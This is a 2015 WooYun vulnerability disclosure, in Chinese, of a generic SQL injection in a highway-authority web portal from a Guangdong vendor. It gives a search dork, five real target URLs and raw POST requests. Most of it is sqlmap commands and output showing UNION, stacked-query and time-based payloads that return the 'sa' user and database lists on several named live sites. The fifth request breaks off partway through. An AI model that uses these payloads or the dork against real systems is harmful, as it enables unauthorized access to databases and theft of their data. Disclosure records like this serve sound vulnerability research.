当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-090082

漏洞标题:某公路门户网站存在通用型SQL注入

相关厂商:广东东方思维科技有限公司

漏洞作者: 路人甲

提交时间:2015-01-08 15:18

修复时间:2015-04-13 16:58

公开时间:2015-04-13 16:58

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-08: 细节已通知厂商并且等待厂商处理中
2015-01-13: 厂商已经确认,细节仅向厂商公开
2015-01-16: 细节向第三方安全合作伙伴开放
2015-03-09: 细节向核心白帽子及相关领域专家公开
2015-03-19: 细节向普通白帽子公开
2015-03-29: 细节向实习白帽子公开
2015-04-13: 细节向公众公开

简要描述:

某公路门户网站存在通用型SQL注入

详细说明:

涉及厂商:广东东方思维科技有限公司
谷歌搜索关键字:inurl:/Empl_Password_Modify.aspx
注入点ctl00%24holderContent%24txtUserName
http://www.hbgzgs.com/WebUI/Admin/Empl_Password_Modify.aspx
http://www.hbbygs.net/WebUI/Admin/Empl_Password_Modify.aspx
http://www.hbybgs.com/WebUI/Admin/Empl_Password_Modify.aspx
http://www.xn--kkrw33fqsryzj.com/WebUI/admin/Empl_Password_Modify.aspx
http://jjgldq.cn/WebUI/Empl_Password_Modify.aspx
1、
POST /WebUI/Admin/Empl_Password_Modify.aspx HTTP/1.1
Content-Length: 707
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.hbgzgs.com/WebUI/Article.aspx?MKBM_CODE=nbgl
Cookie: ASP.NET_SessionId=xq1hkrqoepgxmxqggpv1dmnp
Host: www.hbgzgs.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
ctl00%24holderContent%24btnModify=%e4%bf%ae%e6%94%b9%e5%af%86%e7%a0%81&ctl00%24holderContent%24txtConfirmPassword=g00dPa%24%24w0rD&ctl00%24holderContent%24txtNewPassword=g00dPa%24%24w0rD&ctl00%24holderContent%24txtPassword=g00dPa%24%24w0rD&ctl00%24holderContent%24txtUserName=viiggobd&ctl00%24ImageButton1=&ctl00%24txtKeyWord=%e8%af%b7%e8%be%93%e5%85%a5%e5%85%b3%e9%94%ae%e5%ad%97&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWCAKzjuvpCAKllOrlDQLssvLQAwLpi4HhAQKVuNeDDQLnpPDZAwLn4ZS4BwLQxrzYBwW2Vg6KwLJq/22x1ol6KtqgH0Mb&__VIEWSTATE=/wEPDwUJMzQzMDQ1MDExZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUSY3RsMDAkSW1hZ2VCdXR0b24x%2bscaelpfpirPxA6A2THGWbu51UM%3d
注入点ctl00%24holderContent%24txtUserName
Sqlmap py -r g:\1s.txt -p "ctl00%24holderContent%24txtUserName" --dbs --current-user --current-db
sqlmap identified the following injection points with a total of 98 HTTP(s) requests:
---
Place: POST
Parameter: ctl00$holderContent$txtUserName
Type: UNION query
Title: Generic UNION query (NULL) - 15 columns
Payload: ctl00$holderContent$btnModify=????&ctl00$holderContent$txtConfirmPa
ssword=g00dPa$$w0rD&ctl00$holderContent$txtNewPassword=g00dPa$$w0rD&ctl00$holder
Content$txtPassword=g00dPa$$w0rD&ctl00$holderContent$txtUserName=viiggobd') UNIO
N ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, N
ULL, NULL, NULL, CHAR(58)+CHAR(118)+CHAR(115)+CHAR(119)+CHAR(58)+CHAR(81)+CHAR(1
18)+CHAR(86)+CHAR(85)+CHAR(72)+CHAR(102)+CHAR(89)+CHAR(71)+CHAR(109)+CHAR(101)+C
HAR(58)+CHAR(122)+CHAR(120)+CHAR(107)+CHAR(58)-- &ctl00$ImageButton1=&ctl00$txtK
eyWord=??????&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWCAKzjuvpCAKl
lOrlDQLssvLQAwLpi4HhAQKVuNeDDQLnpPDZAwLn4ZS4BwLQxrzYBwW2Vg6KwLJq/22x1ol6KtqgH0Mb
&__VIEWSTATE=/wEPDwUJMzQzMDQ1MDExZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18
WAQUSY3RsMDAkSW1hZ2VCdXR0b24x+scaelpfpirPxA6A2THGWbu51UM=
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: ctl00$holderContent$btnModify=????&ctl00$holderContent$txtConfirmPa
ssword=g00dPa$$w0rD&ctl00$holderContent$txtNewPassword=g00dPa$$w0rD&ctl00$holder
Content$txtPassword=g00dPa$$w0rD&ctl00$holderContent$txtUserName=viiggobd'); WAI
TFOR DELAY '0:0:5';--&ctl00$ImageButton1=&ctl00$txtKeyWord=??????&__EVENTARGUMEN
T=&__EVENTTARGET=&__EVENTVALIDATION=/wEWCAKzjuvpCAKllOrlDQLssvLQAwLpi4HhAQKVuNeD
DQLnpPDZAwLn4ZS4BwLQxrzYBwW2Vg6KwLJq/22x1ol6KtqgH0Mb&__VIEWSTATE=/wEPDwUJMzQzMDQ
1MDExZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUSY3RsMDAkSW1hZ2VCdXR0b24
x+scaelpfpirPxA6A2THGWbu51UM=
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: ctl00$holderContent$btnModify=????&ctl00$holderContent$txtConfirmPa
ssword=g00dPa$$w0rD&ctl00$holderContent$txtNewPassword=g00dPa$$w0rD&ctl00$holder
Content$txtPassword=g00dPa$$w0rD&ctl00$holderContent$txtUserName=viiggobd') WAIT
FOR DELAY '0:0:5'--&ctl00$ImageButton1=&ctl00$txtKeyWord=??????&__EVENTARGUMENT=
&__EVENTTARGET=&__EVENTVALIDATION=/wEWCAKzjuvpCAKllOrlDQLssvLQAwLpi4HhAQKVuNeDDQ
LnpPDZAwLn4ZS4BwLQxrzYBwW2Vg6KwLJq/22x1ol6KtqgH0Mb&__VIEWSTATE=/wEPDwUJMzQzMDQ1M
DExZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUSY3RsMDAkSW1hZ2VCdXR0b24x+
scaelpfpirPxA6A2THGWbu51UM=
---
[14:43:46] [INFO] testing MySQL
[14:43:52] [WARNING] the back-end DBMS is not MySQL
[14:43:52] [INFO] testing Oracle
[14:43:57] [WARNING] the back-end DBMS is not Oracle
[14:43:57] [INFO] testing PostgreSQL
[14:44:03] [WARNING] the back-end DBMS is not PostgreSQL
[14:44:03] [INFO] testing Microsoft SQL Server
[14:44:08] [INFO] confirming Microsoft SQL Server
[14:44:25] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[14:44:25] [INFO] fetching current user
current user: 'sa'
[14:44:30] [INFO] fetching current database
current database: 'website_GZ'
[14:44:35] [INFO] fetching database names
[14:44:41] [INFO] the SQL query used returns 13 entries
[14:44:46] [INFO] retrieved: "GZ_WSDX"
[14:44:51] [INFO] retrieved: "GZOA"
[14:44:57] [INFO] retrieved: "GZOA_TEST2"
[14:45:02] [INFO] retrieved: "HrData"
[14:45:07] [INFO] retrieved: "master"
[14:45:13] [INFO] retrieved: "model"
[14:45:18] [INFO] retrieved: "msdb"
[14:45:24] [INFO] retrieved: "OT_OTF"
[14:45:30] [INFO] retrieved: "ReportServer$SQL2005"
[14:45:35] [INFO] retrieved: "ReportServer$SQL2005TempDB"
[14:45:40] [INFO] retrieved: "tempdb"
[14:45:46] [INFO] retrieved: "tempdbb"
[14:45:51] [INFO] retrieved: "website_GZ"
available databases [13]:
[*] GZ_WSDX
[*] GZOA
[*] GZOA_TEST2
[*] HrData
[*] master
[*] model
[*] msdb
[*] OT_OTF
[*] ReportServer$SQL2005
[*] ReportServer$SQL2005TempDB
[*] tempdb
[*] tempdbb
[*] website_GZ
2、
POST http://www.hbbygs.net/WebUI/Admin/Empl_Password_Modify.aspx HTTP/1.1
Host: www.hbbygs.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.hbbygs.net/WebUI/Admin/Empl_Password_Modify.aspx
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 400
__EVENTTARGET=ctl00%24holderContent%24btnModify&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUJMzQzMDQ1MDExZGSMVPvNAqXeo5S3dXrw6yhfyLK2mw%3D%3D&__EVENTVALIDATION=%2FwEWBgLXk%2BONAwLpi4HhAQKVuNeDDQLnpPDZAwLn4ZS4BwLQxrzYBzZ9blpf3mJW0tlcigpqCzXqa5Cu&ctl00%24holderContent%24txtUserName=a&ctl00%24holderContent%24txtPassword=a&ctl00%24holderContent%24txtNewPassword=b&ctl00%24holderContent%24txtConfirmPassword=b
注入点ctl00%24holderContent%24txtUserName
Sqlmap py -r g:\1s.txt -p "ctl00%24holderContent%24txtUserName" --dbs --current-user --current-db
sqlmap identified the following injection points with a total of 99 HTTP(s) requ
ests:
---
Place: POST
Parameter: ctl00$holderContent$txtUserName
Type: UNION query
Title: Generic UNION query (NULL) - 15 columns
Payload: __EVENTTARGET=ctl00$holderContent$btnModify&__EVENTARGUMENT=&__VIEW
STATE=/wEPDwUJMzQzMDQ1MDExZGSMVPvNAqXeo5S3dXrw6yhfyLK2mw==&__EVENTVALIDATION=/wE
WBgLXk+ONAwLpi4HhAQKVuNeDDQLnpPDZAwLn4ZS4BwLQxrzYBzZ9blpf3mJW0tlcigpqCzXqa5Cu&ct
l00$holderContent$txtUserName=a') UNION ALL SELECT NULL, NULL, NULL, NULL, NULL,
NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, CHAR(58)+CHAR(113)+CHAR(1
17)+CHAR(109)+CHAR(58)+CHAR(77)+CHAR(90)+CHAR(110)+CHAR(86)+CHAR(101)+CHAR(117)+
CHAR(116)+CHAR(122)+CHAR(115)+CHAR(98)+CHAR(58)+CHAR(111)+CHAR(104)+CHAR(115)+CH
AR(58)-- &ctl00$holderContent$txtPassword=a&ctl00$holderContent$txtNewPassword=b
&ctl00$holderContent$txtConfirmPassword=b
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: __EVENTTARGET=ctl00$holderContent$btnModify&__EVENTARGUMENT=&__VIEW
STATE=/wEPDwUJMzQzMDQ1MDExZGSMVPvNAqXeo5S3dXrw6yhfyLK2mw==&__EVENTVALIDATION=/wE
WBgLXk+ONAwLpi4HhAQKVuNeDDQLnpPDZAwLn4ZS4BwLQxrzYBzZ9blpf3mJW0tlcigpqCzXqa5Cu&ct
l00$holderContent$txtUserName=a'); WAITFOR DELAY '0:0:5';--&ctl00$holderContent$
txtPassword=a&ctl00$holderContent$txtNewPassword=b&ctl00$holderContent$txtConfir
mPassword=b
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: __EVENTTARGET=ctl00$holderContent$btnModify&__EVENTARGUMENT=&__VIEW
STATE=/wEPDwUJMzQzMDQ1MDExZGSMVPvNAqXeo5S3dXrw6yhfyLK2mw==&__EVENTVALIDATION=/wE
WBgLXk+ONAwLpi4HhAQKVuNeDDQLnpPDZAwLn4ZS4BwLQxrzYBzZ9blpf3mJW0tlcigpqCzXqa5Cu&ct
l00$holderContent$txtUserName=a') WAITFOR DELAY '0:0:5'--&ctl00$holderContent$tx
tPassword=a&ctl00$holderContent$txtNewPassword=b&ctl00$holderContent$txtConfirmP
assword=b
---
[15:04:47] [INFO] testing MySQL
[15:04:52] [WARNING] the back-end DBMS is not MySQL
[15:04:52] [INFO] testing Oracle
[15:04:57] [WARNING] the back-end DBMS is not Oracle
[15:04:57] [INFO] testing PostgreSQL
[15:05:01] [WARNING] the back-end DBMS is not PostgreSQL
[15:05:01] [INFO] testing Microsoft SQL Server
[15:05:06] [INFO] confirming Microsoft SQL Server
[15:05:21] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[15:05:21] [INFO] fetching current user
current user: 'sa'
[15:05:29] [INFO] fetching current database
current database: 'BYWZ'
[15:05:33] [INFO] fetching database names
[15:05:38] [INFO] the SQL query used returns 12 entries
[15:05:43] [INFO] retrieved: "BY24"
[15:05:48] [INFO] retrieved: "BYOA"
[15:05:53] [INFO] retrieved: "BYOATEST"
[15:05:58] [INFO] retrieved: "BYWZ"
[15:06:03] [INFO] retrieved: "master"
[15:06:08] [INFO] retrieved: "model"
[15:06:12] [INFO] retrieved: "msdb"
[15:06:18] [INFO] retrieved: "OT_OTF_BY"
[15:06:22] [INFO] retrieved: "ReportServer"
[15:06:28] [INFO] retrieved: "ReportServerTempDB"
[15:06:32] [INFO] retrieved: "tempdb"
[15:06:38] [INFO] retrieved: "zkj"
available databases [12]:
[*] BY24
[*] BYOA
[*] BYOATEST
[*] BYWZ
[*] master
[*] model
[*] msdb
[*] OT_OTF_BY
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] zkj
3、
POST http://www.hbybgs.com/WebUI/Admin/Empl_Password_Modify.aspx HTTP/1.1
Host: www.hbybgs.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.hbybgs.com/WebUI/Admin/Empl_Password_Modify.aspx
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 400
__EVENTTARGET=ctl00%24holderContent%24btnModify&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUJMzQzMDQ1MDExZGRAYTV3Qn5cCg4XyFJ8irDcByYf2g%3D%3D&ctl00%24holderContent%24txtUserName=a&ctl00%24holderContent%24txtPassword=a&ctl00%24holderContent%24txtNewPassword=b&ctl00%24holderContent%24txtConfirmPassword=b&__EVENTVALIDATION%2FwEWBgK4orqxDALpi4HhAQKVuNeDDQLnpPDZAwLn4ZS4BwLQxrzYB2Uuq90r%2BSVrgK3WqwRHMLjY3mI3
注入点ctl00%24holderContent%24txtUserName
Sqlmap py -r g:\1s.txt -p "ctl00%24holderContent%24txtUserName" --dbs --current-user --current-db
sqlmap identified the following injection points with a total of 98 HTTP(s) requ
ests:
---
Place: POST
Parameter: ctl00$holderContent$txtUserName
Type: UNION query
Title: Generic UNION query (NULL) - 15 columns
Payload: __EVENTTARGET=ctl00$holderContent$btnModify&__EVENTARGUMENT=&__VIEW
STATE=/wEPDwUJMzQzMDQ1MDExZGRAYTV3Qn5cCg4XyFJ8irDcByYf2g==&ctl00$holderContent$t
xtUserName=a') UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL,
NULL, NULL, NULL, NULL, CHAR(58)+CHAR(117)+CHAR(108)+CHAR(106)+CHAR(58)+CHAR(117
)+CHAR(67)+CHAR(66)+CHAR(116)+CHAR(115)+CHAR(68)+CHAR(71)+CHAR(84)+CHAR(78)+CHAR
(118)+CHAR(58)+CHAR(120)+CHAR(116)+CHAR(118)+CHAR(58), NULL, NULL-- &ctl00$holde
rContent$txtPassword=a&ctl00$holderContent$txtNewPassword=b&ctl00$holderContent$
txtConfirmPassword=b&__EVENTVALIDATION=/wEWBgK4orqxDALpi4HhAQKVuNeDDQLnpPDZAwLn4
ZS4BwLQxrzYB2Uuq90r+SVrgK3WqwRHMLjY3mI3
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: __EVENTTARGET=ctl00$holderContent$btnModify&__EVENTARGUMENT=&__VIEW
STATE=/wEPDwUJMzQzMDQ1MDExZGRAYTV3Qn5cCg4XyFJ8irDcByYf2g==&ctl00$holderContent$t
xtUserName=a'); WAITFOR DELAY '0:0:5';--&ctl00$holderContent$txtPassword=a&ctl00
$holderContent$txtNewPassword=b&ctl00$holderContent$txtConfirmPassword=b&__EVENT
VALIDATION=/wEWBgK4orqxDALpi4HhAQKVuNeDDQLnpPDZAwLn4ZS4BwLQxrzYB2Uuq90r+SVrgK3Wq
wRHMLjY3mI3
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: __EVENTTARGET=ctl00$holderContent$btnModify&__EVENTARGUMENT=&__VIEW
STATE=/wEPDwUJMzQzMDQ1MDExZGRAYTV3Qn5cCg4XyFJ8irDcByYf2g==&ctl00$holderContent$t
xtUserName=a') WAITFOR DELAY '0:0:5'--&ctl00$holderContent$txtPassword=a&ctl00$h
olderContent$txtNewPassword=b&ctl00$holderContent$txtConfirmPassword=b&__EVENTVA
LIDATION=/wEWBgK4orqxDALpi4HhAQKVuNeDDQLnpPDZAwLn4ZS4BwLQxrzYB2Uuq90r+SVrgK3WqwR
HMLjY3mI3
---
[15:22:06] [INFO] testing MySQL
[15:22:11] [WARNING] the back-end DBMS is not MySQL
[15:22:11] [INFO] testing Oracle
[15:22:16] [WARNING] the back-end DBMS is not Oracle
[15:22:16] [INFO] testing PostgreSQL
[15:22:21] [WARNING] the back-end DBMS is not PostgreSQL
[15:22:21] [INFO] testing Microsoft SQL Server
[15:22:26] [INFO] confirming Microsoft SQL Server
[15:22:40] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[15:22:40] [INFO] fetching current user
current user: 'sa'
[15:22:45] [INFO] fetching current database
current database: 'website'
[15:22:50] [INFO] fetching database names
[15:22:55] [INFO] the SQL query used returns 6 entries
[15:23:00] [INFO] retrieved: "master"
[15:23:05] [INFO] retrieved: "model"
[15:23:10] [INFO] retrieved: "msdb"
[15:23:15] [INFO] retrieved: "tempdb"
[15:23:20] [INFO] retrieved: "website"
[15:23:25] [INFO] retrieved: "YBOA"
available databases [6]:
[*] master
[*] model
[*] msdb
[*] tempdb
[*] website
[*] YBOA
4、
POST http://www.xn--kkrw33fqsryzj.com/WebUI/admin/Empl_Password_Modify.aspx HTTP/1.1
Host: www.xn--kkrw33fqsryzj.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.xn--kkrw33fqsryzj.com/WebUI/admin/Empl_Password_Modify.aspx
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 400
__EVENTTARGET=ctl00%24holderContent%24btnModify&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUJMzQzMDQ1MDExZGRaZxjbxdqMZVDR4vnti17P3163PA%3D%3D&ctl00%24holderContent%24txtUserName=s&ctl00%24holderContent%24txtPassword=s&ctl00%24holderContent%24txtNewPassword=a&ctl00%24holderContent%24txtConfirmPassword=a&__EVENTVALIDATION=%2FwEWBgLUyYrIAgLpi4HhAQKVuNeDDQLnpPDZAwLn4ZS4BwLQxrzYB6XDyEDOdJtzsvXRKTb1ogb%2FYjXG
注入点ctl00%24holderContent%24txtUserName
Sqlmap py -r g:\1s.txt -p "ctl00%24holderContent%24txtUserName" --dbs --current-user --current-db
sqlmap identified the following injection points with a total of 97 HTTP(s) requ
ests:
---
Place: POST
Parameter: ctl00$holderContent$txtUserName
Type: UNION query
Title: Generic UNION query (NULL) - 15 columns
Payload: __EVENTTARGET=ctl00$holderContent$btnModify&__EVENTARGUMENT=&__VIEW
STATE=/wEPDwUJMzQzMDQ1MDExZGRaZxjbxdqMZVDR4vnti17P3163PA==&ctl00$holderContent$t
xtUserName=s') UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL,
NULL, NULL, NULL, NULL, CHAR(58)+CHAR(109)+CHAR(100)+CHAR(103)+CHAR(58)+CHAR(77)
+CHAR(71)+CHAR(77)+CHAR(115)+CHAR(104)+CHAR(65)+CHAR(76)+CHAR(103)+CHAR(99)+CHAR
(79)+CHAR(58)+CHAR(105)+CHAR(109)+CHAR(121)+CHAR(58), NULL, NULL-- &ctl00$holder
Content$txtPassword=s&ctl00$holderContent$txtNewPassword=a&ctl00$holderContent$t
xtConfirmPassword=a&__EVENTVALIDATION=/wEWBgLUyYrIAgLpi4HhAQKVuNeDDQLnpPDZAwLn4Z
S4BwLQxrzYB6XDyEDOdJtzsvXRKTb1ogb/YjXG
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: __EVENTTARGET=ctl00$holderContent$btnModify&__EVENTARGUMENT=&__VIEW
STATE=/wEPDwUJMzQzMDQ1MDExZGRaZxjbxdqMZVDR4vnti17P3163PA==&ctl00$holderContent$t
xtUserName=s'); WAITFOR DELAY '0:0:5';--&ctl00$holderContent$txtPassword=s&ctl00
$holderContent$txtNewPassword=a&ctl00$holderContent$txtConfirmPassword=a&__EVENT
VALIDATION=/wEWBgLUyYrIAgLpi4HhAQKVuNeDDQLnpPDZAwLn4ZS4BwLQxrzYB6XDyEDOdJtzsvXRK
Tb1ogb/YjXG
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: __EVENTTARGET=ctl00$holderContent$btnModify&__EVENTARGUMENT=&__VIEW
STATE=/wEPDwUJMzQzMDQ1MDExZGRaZxjbxdqMZVDR4vnti17P3163PA==&ctl00$holderContent$t
xtUserName=s') WAITFOR DELAY '0:0:5'--&ctl00$holderContent$txtPassword=s&ctl00$h
olderContent$txtNewPassword=a&ctl00$holderContent$txtConfirmPassword=a&__EVENTVA
LIDATION=/wEWBgLUyYrIAgLpi4HhAQKVuNeDDQLnpPDZAwLn4ZS4BwLQxrzYB6XDyEDOdJtzsvXRKTb
1ogb/YjXG
---
[15:35:30] [INFO] testing MySQL
[15:35:35] [WARNING] the back-end DBMS is not MySQL
[15:35:35] [INFO] testing Oracle
[15:35:40] [WARNING] the back-end DBMS is not Oracle
[15:35:40] [INFO] testing PostgreSQL
[15:35:46] [WARNING] the back-end DBMS is not PostgreSQL
[15:35:46] [INFO] testing Microsoft SQL Server
[15:35:51] [INFO] confirming Microsoft SQL Server
[15:36:07] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[15:36:07] [INFO] fetching current user
current user: 'sa'
[15:36:12] [INFO] fetching current database
current database: 'OT_SB_WEBSITE'
[15:36:18] [INFO] fetching database names
[15:36:23] [INFO] the SQL query used returns 9 entries
[15:36:28] [INFO] retrieved: "master"
[15:36:33] [INFO] retrieved: "model"
[15:36:39] [INFO] retrieved: "msdb"
[15:36:44] [INFO] retrieved: "OT_OTF_SB"
[15:36:49] [INFO] retrieved: "OT_SB_OA"
[15:36:55] [INFO] retrieved: "OT_SB_WEBSITE"
[15:37:00] [INFO] retrieved: "OTF_TEST"
[15:37:05] [INFO] retrieved: "SB_WSDX"
[15:37:11] [INFO] retrieved: "tempdb"
available databases [9]:
[*] master
[*] model
[*] msdb
[*] OT_OTF_SB
[*] OT_SB_OA
[*] OT_SB_WEBSITE
[*] OTF_TEST
[*] SB_WSDX
[*] tempdb
5、
POST http://jjgldq.cn/WebUI/Empl_Password_Modify.aspx HTTP/1.1
Host: jjgldq.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://jjgldq.cn/WebUI/Empl_Password_Modify.aspx
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 5132
__EVENTTARGET=ctl00%24holderContent%24btnModify&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUJMzQzMDQ1MDExD2QWAmYPZBYCAgMPZBYEZg8WAh4LXyFJdGVtQ291bnQCARYCZg9kFgRmDxUBGVQyMDExMDEyNDExMjMyMTMwMTAwMDEzNTBkAgEPDxYEHgRUZXh0BZkD6I2j6KqJ5qac77yaMjAxMuW5tDktMTDmnIjkvJjog5zmlr3lt6XljZXkvY3vvJrnrKzkuIDlkI3vvJpCMuWQiOWQjOauteKAlOKAlOS4reS6pOesrOS6jOiIquWKoeW3peeoi%2BWxgOaciemZkOWFrOWPuO%2B8jOesrOS6jOWQje%2B8mkEx5ZCI5ZCM5q614oCU4oCU6Lev5qGl5Y2O5Y2X5bel56iL5pyJ6ZmQ5YWs5Y%2B477yM56ys5LiJ5ZCN77yaQjPlkIjlkIzmrrXigJTigJTkuK3pk4HkuIDlsYDpm4blm6LmoaXmooHlt6XnqIvmnInpmZDlhazlj7jjgIFQMeWQiOWQjOauteKAlOKAlOaxn%2Bilv%2Bi1o%2BeypOmrmOmAn%2BWFrOi3r%2BW3peeoi%2BaciemZkOi0o%2BS7u%2BWFrOWPuOOAgiDkvJjog5znm5HnkIbljZXkvY3vvJpSMempu%2BWcsOWKnuKAlOKAlOaxn%2Bilv%2BecgeWYieWSjOW3peeoi%2BWSqOivouebkeeQhuaciemZkOWFrOWPuOOAgh4HVG9vbFRpcAWZA%2BiNo%2BiqieamnO%2B8mjIwMTLlubQ5LTEw5pyI5LyY6IOc5pa95bel5Y2V5L2N77ya56ys5LiA5ZCN77yaQjLlkIjlkIzmrrXigJTigJTkuK3kuqTnrKzkuozoiKrliqHlt6XnqIvlsYDmnInpmZDlhazlj7jvvIznrKzkuozlkI3vvJpBMeWQiOWQjOauteKAlOKAlOi3r%2BahpeWNjuWNl%2BW3peeoi%2BaciemZkOWFrOWPuO%2B8jOesrOS4ieWQje%2B8mkIz5ZCI5ZCM5q614oCU4oCU5Lit6ZOB5LiA5bGA6ZuG5Zui5qGl5qKB5bel56iL5pyJ6ZmQ5YWs5Y%2B444CBUDHlkIjlkIzmrrXigJTigJTmsZ%2Fopb%2FotaPnsqTpq5jpgJ%2Flhazot6%2Flt6XnqIvmnInpmZDotKPku7vlhazlj7jjgIIg5LyY6IOc55uR55CG5Y2V5L2N77yaUjHpqbvlnLDlip7igJTigJTmsZ%2Fopb%2FnnIHlmInlkozlt6XnqIvlkqjor6Lnm5HnkIbmnInpmZDlhazlj7jjgIJkZAIBD2QWBGYPPCsACQEADxYEHghEYXRhS2V5cxYAHwACBmQWDGYPZBYCZg8VAiIvV2ViVUkvQXJ0aWNsZS5hc3B4P01LQk1fQ09ERT1YWEdHBuWFrOWRimQCAQ9kFgJmDxUCIi9XZWJVSS9BcnRpY2xlLmFzcHg%2FTUtCTV9DT0RFPVhXR0oM5paw6Ze75bm%2F6KeSZAICD2QWAmYPFQIiL1dlYlVJL0FydGljbGUuYXNweD9NS0JNX0NPREU9WVhKSgzkuIDnur%2FogZrnhKZkAgMPZBYCZg8VAiIvV2ViVUkvQXJ0aWNsZS5hc3B4P01LQk1fQ09ERT1NVFpTDOWqkuS9k%2BS5i%2BWjsGQCBA9kFgJmDxUCIi9XZWJVSS9BcnRpY2xlLmFzcHg%2FTUtCTV9DT0RFPVJXVFgM5Lq654mp54m55YaZZAIFD2QWAmYPFQIiL1dlYlVJL0FydGljbGUuYXNweD9NS0JNX0NPREU9WU5aWAzkuJrlhoXotYTorq9kAgEPPCsACQEADxYEHwMWAB8AAghkFhBmD2QWBmYPFQIWMjAwOOW5tOW6puW3peS9nOi%2Fm%2BWxlRlUMjAwOTA0MTYwODU2MDA4OTEwMDAwNDY4ZAIBDw8WAh4HVmlzaWJsZWhkZAICDw8WBB8BBRYyMDA45bm05bqm5bel5L2c6L%2Bb5bGVHwIFFjIwMDjlubTluqblt6XkvZzov5vlsZVkZAIBD2QWBmYPFQIw56aP6ZO26auY6YCf5Lmd5rGf6ZW%2F5rGf5YWs6Lev5aSn5qGl6aG555uu566A5LuLGVQyMDA5MDQxNjE2NDQ1MTk4MTAwMDM1MTNkAgEPDxYCHwRoZGQCAg8PFgQfAQUn56aP6ZO26auY6YCf5Lmd5rGf6ZW%2F5rGf5YWs6Lev5aSn5qGlLi4uHwIFMOemj%2BmTtumrmOmAn%2BS5neaxn%2BmVv%2Baxn%2BWFrOi3r%2BWkp%2BahpemhueebrueugOS7i2RkAgIPZBYGZg8VAjzkuZ3msZ%2Fplb%2FmsZ%2Flhazot6%2FlpKfmoaXpobnnm67mipXor4njgIHkuL7miqXlj5fnkIbkuIDop4jooagZVDIwMTEwMzMwMTE1MzE5MzExMDAwMDkyMWQCAQ8PFgIfBGhkZAICDw8WBB8BBSfkuZ3msZ%2Fplb%2FmsZ%2Flhazot6%2FlpKfmoaXpobnnm67mipXor4kuLi4fAgU85Lmd5rGf6ZW%2F5rGf5YWs6Lev5aSn5